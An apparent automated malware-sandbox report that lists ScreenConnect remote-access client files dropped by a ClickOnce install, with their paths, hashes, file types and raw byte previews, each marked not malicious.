                                                                                                                                                                                                                                        SHA-512:8922EF9D29C0CD1821C4F560E27D56380CED2CCC0395C19CE4EB9AE28781CAAAB4A225AA634EF035EC5C4BEE27D7A4E3661622F5F5B1B1E74BE5EDF1427666D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PcmH.........S..5'u|@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........]..*...........}'.d................z..w.....[~31.X......E..X.....s".I...R....y..&..d."....B(.....#...C.....&...O.&r..Vz)...^.ie...u,...[s.T..</...F.....Ey2...f..VC..5......;..8.....V....X;........... ...$...'...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...T...........@...................................,...(...4.......\.......d.......x...(...............................(.......................(...........D.......L...(...d...................(.......................(.......................(...,.......T.......\...(...h...................(.......................(...........................................................................<.......................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                        Entropy (8bit):5.025603000423177
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AEHMDAXQ3MDTMDRGTDBTo:1YiW4ALsvcx
                                                                                                                                                                                                                                        MD5:F8EE5554BAB7AE67A2373703243F634E
                                                                                                                                                                                                                                        SHA1:D30490278145AB14366D55959945E7DB1A444FFA
                                                                                                                                                                                                                                        SHA-256:33578584A89CC841B992603039410B1B93907CBFDF0FA6BD0C6E12680A804C02
                                                                                                                                                                                                                                        SHA-512:552087971AD984B4FC36F69E68F46977C0E31E6DD7DF249332D2783F807254DF46C8F8BF7F7F18A48F606CF5C09026620770DF63DC91A636F842F950C22EA174
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9fe7bca0c4ca064.cdf-ms

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3032
                                                                                                                                                                                                                                        Entropy (8bit):4.5394001017913626
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:mnNQ/cwgIe6S+9oww7gp7Tk2CVjz15JeQ7nwbq:om/cUeV+WwwmTk91jeQ7nEq
                                                                                                                                                                                                                                        MD5:4BD661401AA82ABAED08C151CA341141
                                                                                                                                                                                                                                        SHA1:797EC66B986F885898EBA88C9DB2E1D1D7C32699
                                                                                                                                                                                                                                        SHA-256:57FB1DC197D4953D2890D660EFAEB0F3014F23D87858389BAF475F08720FC8CF
                                                                                                                                                                                                                                        SHA-512:0388A2B5BA8132A64F1DF9EB5F27B07B9AED4D97B32E14F5F9B20D979DE75440F3CC267B5B59575BEBC752A4BEEB375B1C6D4A2243A6940A8CFBEE8C5EAD8377
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PcmH...........3...T............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........]..*.........S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...........................................................<...............................................<...............................................<...nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.4.2.9083%....................................................MdHd............<...........MdSp ...$....... ...".............Bi urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9fe7bca0c4ca064.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                        Entropy (8bit):5.148447070499623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AWR7vNxW57FpS+iENg49vNxW5NgMRNg49vNxWO:JdFYZ8h9onRigeP0AJvSkcyMDcVSkTo
                                                                                                                                                                                                                                        MD5:131D3A2329559EDB69DFAE83D4F7FF6F
                                                                                                                                                                                                                                        SHA1:16E303B64B7007C64A5FACC76A3876B3AD8BFC6F
                                                                                                                                                                                                                                        SHA-256:78B036CA84FBE94BC5DCFFA3F8BFB563ABBEC1E645C2053043C288A896EEE760
                                                                                                                                                                                                                                        SHA-512:7D5CAD1324B4B7275967F657648FADA1BA74A15497678F5FAF1430758ACC8B0E442D5E7EB2707AC37785480FED139D270831A54F14EB640F54F633EACC9087DB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..tion_25b0fbb6ef7eb094_0018.0004_none_3973f602a7b112cf.cdf-ms

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):14608
                                                                                                                                                                                                                                        Entropy (8bit):5.7101911293072645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:b/Vs9rEK6Hbc8s8oj0MN8s8oTN2x2QPIlFDLhEDh7BqWojO9:b/69rEK6HwX9VX9R/QPIBM7YjC
                                                                                                                                                                                                                                        MD5:130CE709203E6FD72FE7412F5859856E
                                                                                                                                                                                                                                        SHA1:591B84A9EC3EEDC07CC93CE28C892111002F1B54
                                                                                                                                                                                                                                        SHA-256:21B7EF1573933C4CC6E88DBB1ADEA80D1E8B0C5C2BF8AFD52AB9DB2D0547722B
                                                                                                                                                                                                                                        SHA-512:6FB66AA56843002A26F6B657D6BE6AFA7F3506AF74E4C155CDE9BF4D1BA1B5F15E4B6E3C5A80BF8AB1AC95E71501E3FC2B14822A07DE0670EC90CFB6E0A3509F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PcmH............H4.)$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........]..*............8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......<8......D8......L8......l8......p8..L...x8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%f.......wpU.T......d...\............-........................E..................................<...4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.4.2.9083%........................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..tion_25b0fbb6ef7eb094_0018.0004_none_3973f602a7b112cf.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):118570
                                                                                                                                                                                                                                        Entropy (8bit):5.58802022381172
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Q0/CcT51/FXvMVNWfCXq9ymKQm2o9HuzhJOvP:ZCcfiVIEQmt8vOvP
                                                                                                                                                                                                                                        MD5:F450107E1E082AB0A9F72C187D9CD440
                                                                                                                                                                                                                                        SHA1:DBAE33BCEA9D70C0B32E01D9BD0BFBC5AC3CD087
                                                                                                                                                                                                                                        SHA-256:B1A80158AD4B45F74C4A74F943CFF18F6888DBAE987C4C34717B6EEF9F1CF9B9
                                                                                                                                                                                                                                        SHA-512:4122737EF3F4EF05E7F1FE45DE96BC974CB153C236B9E66B62FFD71088F06D43E9E031994382378102504C0E62A262B335E6A5BF1FC29BEF566CC6233C6DBAE7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.4.2.9083" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..vice_4b14c015c87c1ad8_0018.0004_none_053cb64092bcadcb.cdf-ms

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4428
                                                                                                                                                                                                                                        Entropy (8bit):4.429510656357047
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:fsWeV+Ww8945u/Cq6Np+Z9yM+fGnDv3uGf:QJmu/j6p8+aD/J
                                                                                                                                                                                                                                        MD5:399C9154BEF10F41712FC5E7C68222E7
                                                                                                                                                                                                                                        SHA1:EB23B3FA34D5689D4500FEAFBEAF8DDD478C4908
                                                                                                                                                                                                                                        SHA-256:75982EE0C3D16D65FA01EFB1E56C09292D6825B074D972F3AF9C1A78AB02D7DD
                                                                                                                                                                                                                                        SHA-512:EF06220FC63892708044A6B9DC7085FE1D303338FE36D839D2F6FB92E416724093560332AE36F02B78255D5776549FB9B6AADF28C32A5E595098A07D8026ADFC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PcmH...............,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........]..*..........6...................z..w.....[~31.X......E..X.....s".I...R....O.&r..Vz....y..&..d. ....B(.....!...[s.T..<$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(.......................(...........................(...(...8.......`.......h...(...|...................(...............L...........0...............................................<...............................................<...............................................<...............................................<...............................................<...............................................<...nameScreenConnect.Cl

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..vice_4b14c015c87c1ad8_0018.0004_none_053cb64092bcadcb.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                        Entropy (8bit):5.085064362578612
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0Ah+vSkcyMDcbEMDcuMDcVSkcf5bdTo:3FYZ8h9o9gI0AhCHMDTMD3MDGAXTo
                                                                                                                                                                                                                                        MD5:A76A11959003296D5D51977FCCA1A318
                                                                                                                                                                                                                                        SHA1:80D5EDD082ECC84E1989A425475A21084D3007B3
                                                                                                                                                                                                                                        SHA-256:6728343B086A6BDA1D771D9DAC1C894A4D26F38D3CD4DFCC1BE31D99F6C89494
                                                                                                                                                                                                                                        SHA-512:17738FDD0F29C7C6CB7EB8EF7665623ABB6E17DAB430A7840BA416BA93E7BB7D8ECC256919A57944A9A0CA52954DAFB9CCB4D192A5C1860C491E04789F86A310
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95512
                                                                                                                                                                                                                                        Entropy (8bit):6.50477752737346
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ig1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgsU0HMF7aw:zhbNDxZGXfdHrX7rAc6myJkgsU0H2B
                                                                                                                                                                                                                                        MD5:0282251F1E4AF3F721D7192118A8FD2F
                                                                                                                                                                                                                                        SHA1:333A207282B5127674560B2F290D890214FCFA7A
                                                                                                                                                                                                                                        SHA-256:906075E5A4CEDF4793EF18C4C8DA01B0E8798E9EEBCBC2287BA1F470CAFBDAF5
                                                                                                                                                                                                                                        SHA-512:80FDA5639D41F924C6A0C2E1D798A5433DD1C6043C6E9A03EB1CE0CEF7D75339676743E7BEF4A4C8D548B9FE293CC591822B4FEB77FCF61F84EAD4C13EDCBC6C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@..................................o....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61208
                                                                                                                                                                                                                                        Entropy (8bit):6.323071111905421
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6yot+ktY7OUZXPGQDvmDtyQXIE+TCBtIfXWbJe79o7p:6yYtxURPGZyQVwWem
                                                                                                                                                                                                                                        MD5:9191DE53DBFFC88DDBF49B88CC124B74
                                                                                                                                                                                                                                        SHA1:BAD54B6C1EDB1D37158BF3EEA16B0253452F9445
                                                                                                                                                                                                                                        SHA-256:7205B27FCEB210388597BEDD40786809EEC51163225ED6BBA9E7BC0FBB6B8A65
                                                                                                                                                                                                                                        SHA-512:341FA333A23737D6A79A3C98D317E30EEC7BD23C5DD42742603EB900F5DF654ADEAD2CD4B82132B6F614755D5ECBC0E4D7CBCA36240E93CCAB1042EF51C28417
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............"...0.............^.... ........@.. ....................... ......;.....@.....................................O....... ................)..........P...8............................................ ............... ..H............text...d.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................=.......H........S................................................................(....*^.(.......b...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s"...o(...%~....o)...}......(....o*...o+....(,.....A...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):81688
                                                                                                                                                                                                                                        Entropy (8bit):5.8621631504225675
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Wty/l44QzbkI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7/T7r3:VdxukLdjTP
                                                                                                                                                                                                                                        MD5:0EE5B092F5EFFA84DB5A1CE93417D8C1
                                                                                                                                                                                                                                        SHA1:21FF86BB144960D36628D649EB1485A646987E02
                                                                                                                                                                                                                                        SHA-256:5859F53DCB98ECB2C427E56BB95A71A1DA8B9937128BF49C82EC17EBE948EA80
                                                                                                                                                                                                                                        SHA-512:A6F6DC72AA5C4C8C9E7B0D03BB710D5B44F90B19EB44BC31DC6B020E685E4F985622A978E775CF892C52CAA679ED78E4ECF0BC03E5D8152A54C1ED8FA88BEBC3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............"...0..@...........^... ...`....@.. .......................`............@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..core_4b14c015c87c1ad8_0018.0004_none_53e91df7fcfd4a60\ScreenConnect.Core.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):549888
                                                                                                                                                                                                                                        Entropy (8bit):6.035813011819646
                                                                                                                                                                                                                                        Encrypted:false
